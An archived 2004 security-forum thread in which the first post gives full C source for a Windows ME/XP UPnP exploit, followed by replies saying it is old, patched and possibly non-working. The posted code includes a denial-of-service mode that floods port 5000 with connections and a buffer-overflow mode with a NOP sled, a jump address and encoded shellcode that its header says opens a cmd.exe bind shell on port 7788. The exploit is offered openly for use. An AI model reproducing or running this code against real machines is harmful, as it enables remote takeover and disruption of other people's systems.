hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant
Help - Search - Member List - Calendar
Full Version: Upnp Finally
GovernmentSecurity.org > The Archives > Exploit Articles
extreme
May 20 2004, 10:14 PM
Long awaited exploit for UNPN, but it would be nice if someone would port it to Win:
CODE
/*
* WinME/XP UPNP dos & overflow
*
* Run: ./XPloit host <option>
*
* Windows run the "Universal Plug and Play technology" service
* at port 5000. In the future this will allow for seemless
* connectivity of various devices such as a printer.
* This service have a DoS and a buffer overflow I exploit here.
*
* PD: the -e option spawns a cmd.exe shell on port 7788 coded by isno
*
* Author: Gabriel Maggiotti
* Email: gmaggiot@ciudad.com.ar
* Webpage: http://qb0x.net
*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <unistd.h>
#include <fcntl.h>

#define MAX 10000
#define PORT 5000
#define FREEZE 512
#define NOP 0x43 //inc ebx, instead of 0x90

/***************************************************************************/

int main(int argc,char *argv[])
{
int sockfd[MAX];
char sendXP[]="XP";
char jmpcode[281], execode[840],request[2048];
char *send_buffer;
int num_socks;
int bindport;
int i;
int port;

unsigned char shellcode[] =
       "\x90\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90\x90"
       "\x90\x8b\xc5\x33\xc9\x66\xb9\x10\x03\x50\x80\x30\x97\x40\xe2\xfa"
       "\x7e\x8e\x95\x97\x97\xcd\x1c\x4d\x14\x7c\x90\xfd\x68\xc4\xf3\x36"
       "\x97\x97\x97\x97\xc7\xf3\x1e\xb2\x97\x97\x97\x97\xa4\x4c\x2c\x97"
       "\x97\x77\xe0\x7f\x4b\x96\x97\x97\x16\x6c\x97\x97\x68\x28\x98\x14"
       "\x59\x96\x97\x97\x16\x54\x97\x97\x96\x97\xf1\x16\xac\xda\xcd\xe2"
       "\x70\xa4\x57\x1c\xd4\xab\x94\x54\xf1\x16\xaf\xc7\xd2\xe2\x4e\x14"
       "\x57\xef\x1c\xa7\x94\x64\x1c\xd9\x9b\x94\x5c\x16\xae\xdc\xd2\xc5"
       "\xd9\xe2\x52\x16\xee\x93\xd2\xdb\xa4\xa5\xe2\x2b\xa4\x68\x1c\xd1"
       "\xb7\x94\x54\x1c\x5c\x94\x9f\x16\xae\xd0\xf2\xe3\xc7\xe2\x9e\x16"
       "\xee\x93\xe5\xf8\xf4\xd6\xe3\x91\xd0\x14\x57\x93\x7c\x72\x94\x68"
       "\x94\x6c\x1c\xc1\xb3\x94\x6d\xa4\x45\xf1\x1c\x80\x1c\x6d\x1c\xd1"
       "\x87\xdf\x94\x6f\xa4\x5e\x1c\x58\x94\x5e\x94\x5e\x94\xd9\x8b\x94"
       "\x5c\x1c\xae\x94\x6c\x7e\xfe\x96\x97\x97\xc9\x10\x60\x1c\x40\xa4"
       "\x57\x60\x47\x1c\x5f\x65\x38\x1e\xa5\x1a\xd5\x9f\xc5\xc7\xc4\x68"
       "\x85\xcd\x1e\xd5\x93\x1a\xe5\x82\xc5\xc1\x68\xc5\x93\xcd\xa4\x57"
       "\x3b\x13\x57\xe2\x6e\xa4\x5e\x1d\x99\x13\x5e\xe3\x9e\xc5\xc1\xc4"
       "\x68\x85\xcd\x3c\x75\x7f\xd1\xc5\xc1\x68\xc5\x93\xcd\x1c\x4f\xa4"
 "\x57\x3b\x13\x57\xe2\x6e\xa4\x5e\x1d\x99\x17\x6e\x95\xe3\x9e\xc5"
       "\xc1\xc4\x68\x85\xcd\x3c\x75\x70\xa4\x57\xc7\xd7\xc7\xd7\xc7\x68"
       "\xc0\x7f\x04\xfd\x87\xc1\xc4\x68\xc0\x7b\xfd\x95\xc4\x68\xc0\x67"
       "\xa4\x57\xc0\xc7\x27\x9b\x3c\xcf\x3c\xd7\x3c\xc8\xdf\xc7\xc0\xc1"
       "\x3a\xc1\x68\xc0\x57\xdf\xc7\xc0\x3a\xc1\x3a\xc1\x68\xc0\x57\xdf"
       "\x27\xd3\x1e\x90\xc0\x68\xc0\x53\xa4\x57\x1c\xd1\x63\x1e\xd0\xab"
       "\x1e\xd0\xd7\x1c\x91\x1e\xd0\xaf\xa4\x57\xf1\x2f\x96\x96\x1e\xd0"
       "\xbb\xc0\xc0\xa4\x57\xc7\xc7\xc7\xd7\xc7\xdf\xc7\xc7\x3a\xc1\xa4"
       "\x57\xc7\x68\xc0\x5f\x68\xe1\x67\x68\xc0\x5b\x68\xe1\x6b\x68\xc0"
       "\x5b\xdf\xc7\xc7\xc4\x68\xc0\x63\x1c\x4f\xa4\x57\x23\x93\xc7\x56"
       "\x7f\x93\xc7\x68\xc0\x43\x1c\x67\xa4\x57\x1c\x5f\x22\x93\xc7\xc7"
       "\xc0\xc6\xc1\x68\xe0\x3f\x68\xc0\x47\x14\xa8\x96\xeb\xb5\xa4\x57"
       "\xc7\xc0\x68\xa0\xc1\x68\xe0\x3f\x68\xc0\x4b\x9c\x57\xe3\xb8\xa4"
       "\x57\xc7\x68\xa0\xc1\xc4\x68\xc0\x6f\xfd\xc7\x68\xc0\x77\x7c\x5f"
       "\xa4\x57\xc7\x23\x93\xc7\xc1\xc4\x68\xc0\x6b\xc0\xa4\x5e\xc6\xc7"
       "\xc1\x68\xe0\x3b\x68\xc0\x4f\xfd\xc7\x68\xc0\x77\x7c\x3d\xc7\x68"
       "\xc0\x73\x7c\x69\xcf\xc7\x1e\xd5\x65\x54\x1c\xd3\xb3\x9b\x92\x2f"
  &nbsp;    "\x97\x97\x97\x50\x97\xef\xc1\xa3\x85\xa4\x57\x54\x7c\x7b\x7f\x75"
       "\x6a\x68\x68\x7f\x05\x69\x68\x68\xdc\xc1\x70\xe0\xb4\x17\x70\xe0"
       "\xdb\xf8\xf6\xf3\xdb\xfe\xf5\xe5\xf6\xe5\xee\xd6\x97\xdc\xd2\xc5"
       "\xd9\xd2\xdb\xa4\xa5\x97\xd4\xe5\xf2\xf6\xe3\xf2\xc7\xfe\xe7\xf2"
       "\x97\xd0\xf2\xe3\xc4\xe3\xf6\xe5\xe3\xe2\xe7\xde\xf9\xf1\xf8\xd6"
 "\x97\xd4\xe5\xf2\xf6\xe3\xf2\xc7\xe5\xf8\xf4\xf2\xe4\xe4\xd6\x97"
       "\xd4\xfb\xf8\xe4\xf2\xdf\xf6\xf9\xf3\xfb\xf2\x97\xc7\xf2\xf2\xfc"
       "\xd9\xf6\xfa\xf2\xf3\xc7\xfe\xe7\xf2\x97\xd0\xfb\xf8\xf5\xf6\xfb"
       "\xd6\xfb\xfb\xf8\xf4\x97\xc0\xe5\xfe\xe3\xf2\xd1\xfe\xfb\xf2\x97"
       "\xc5\xf2\xf6\xf3\xd1\xfe\xfb\xf2\x97\xc4\xfb\xf2\xf2\xe7\x97\xd2"
       "\xef\xfe\xe3\xc7\xe5\xf8\xf4\xf2\xe4\xe4\x97\x97\xc0\xc4\xd8\xd4"
       "\xdc\xa4\xa5\x97\xe4\xf8\xf4\xfc\xf2\xe3\x97\xf5\xfe\xf9\xf3\x97"
       "\xfb\xfe\xe4\xe3\xf2\xf9\x97\xf6\xf4\xf4\xf2\xe7\xe3\x97\xe4\xf2"
       "\xf9\xf3\x97\xe5\xf2\xf4\xe1\x97\x95\x97\x89\xfb\x97\x97\x97\x97"
       "\x97\x97\x97\x97\x97\x97\x97\x97\xf4\xfa\xf3\xb9\xf2\xef\xf2\x97"
       "\x68\x68\x68\x68";
struct hostent *he;
struct sockaddr_in their_addr;


 if(argc!=3)
 {
   fprintf(stderr,"usage:%s <hostname> <command>\n",argv[0]);
   fprintf(stderr,"-f freeze the machine.\n");
   fprintf(stderr,"-e exploit.\n");
   exit(1);
 }


 if(strstr(argv[2],"-f")) {
   num_socks=FREEZE;
   send_buffer=sendXP;
 }

 if(strstr(argv[2],"-e")) {
   num_socks=1;
   send_buffer=request;
   bindport^=0x9797;
   shellcode[778]= (bindport) & 0xff;
   shellcode[779]= (bindport >> 8) & 0xff;

   for(i = 0; i < 268; i++)
           jmpcode[i] = (char)NOP;

   jmpcode[268] = (char)0x4d;
   jmpcode[269] = (char)0x3f;
   jmpcode[270] = (char)0xe3;
   jmpcode[271] = (char)0x77;
   jmpcode[272] = (char)0x90;
   jmpcode[273] = (char)0x90;
   jmpcode[274] = (char)0x90;
   jmpcode[275] = (char)0x90;

   //jmp [ebx+0x64], jump to execute shellcode
   jmpcode[276] = (char)0xff;
   jmpcode[277] = (char)0x63;
   jmpcode[278] = (char)0x64;
   jmpcode[279] = (char)0x90;
   jmpcode[280] = (char)0x00;

   for(i = 0; i < 32; i++)
        execode[i] = (char)NOP;
   execode[32]=(char)0x00;
   strcat(execode, shellcode);

        snprintf(request, 2048, "%s%s\r\n\r\n", jmpcode, execode);
 }

 if((he=gethostbyname(argv[1]))==NULL)
 {
   perror("gethostbyname");
   exit(1);
 }


/***************************************************************************/

 for(i=0; i<num_socks;i++)
   if( (sockfd[i]=socket(AF_INET,SOCK_STREAM,0)) == -1) {
     perror("socket"); exit(1);
   }


 their_addr.sin_family=AF_INET;
 their_addr.sin_port=htons(PORT);
 their_addr.sin_addr=*((struct in_addr*)he->h_addr);
 bzero(&(their_addr.sin_zero),8);



 for(i=0; i<num_socks;i++)
   if( connect(sockfd[i],(struct sockaddr*)&their_addr, sizeof(struct sockaddr))==-1)
 {
   perror("connect");
   exit(1);
 }


 for(i=0; i<num_socks;i++)
 if(send(sockfd[i],send_buffer,strlen(send_buffer),0) ==-1)
 {
   perror("send");
   exit(0);
 }


 for(i=0; i<num_socks;i++)
 close(sockfd[i]);


return 0;
}

toska
May 20 2004, 10:18 PM
thnx extreme! i'll check it out..... smile.gif
icenix
May 20 2004, 10:27 PM
heh wink.gif its been round the block a few times biggrin.gif
but its always nice to get it posted for an easy access if people dont know where to look biggrin.gif

good work bud wink.gif
Paul
May 20 2004, 10:52 PM
long awaited ?
2002-01-06
101
May 20 2004, 10:55 PM

hole is patched in XP SP1 ... let this shit.
extreme
May 20 2004, 10:58 PM
this got out today ..don't mix it with old exploits......
F34R
May 20 2004, 11:14 PM
hmm... thanks anyways.
cyrixx
May 21 2004, 06:57 AM
l0l, another upnp exploit smile.gif
Killaloop
May 21 2004, 07:43 AM
this exploit never worked and its old as hell
here is a direct link
http://www.securiteam.com/exploits/5SP011560G.html

release date:
4/1/2002

please validate exploits before posting old things here smile.gif
GhostCow
May 21 2004, 11:50 AM
yea saw it here on the board like seven billion times each time they say its new blah blah best blah... this hole is looooong gone sad.gif
101
May 21 2004, 11:58 AM
QUOTE (extreme @ May 20 2004, 10:58 PM)
this got out today ..don't mix it with old exploits......


lol extreme , try to think b4 to do a thread.
ie: you can build 1000000* exploits for a hole , but as soon as the product owner patched it , this is no more exploitable.
extreme
May 21 2004, 01:13 PM
If I made a mistake, then Security Focus also made a mistake, because they published this thing just a day ago..
nuorder
May 21 2004, 01:56 PM
QUOTE (extreme @ May 21 2004, 11:13 PM)
If I made a mistake, then Security Focus also made a mistake, because they published this thing just a day ago..

whats the entire url for that?
slb33
May 21 2004, 06:49 PM
I just compared one that I got about 1 year ago to the one that is posted here.
They are exactly the same as far as I can tell.
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
 
Invision Power Board © 2001-2005 Invision Power Services, Inc.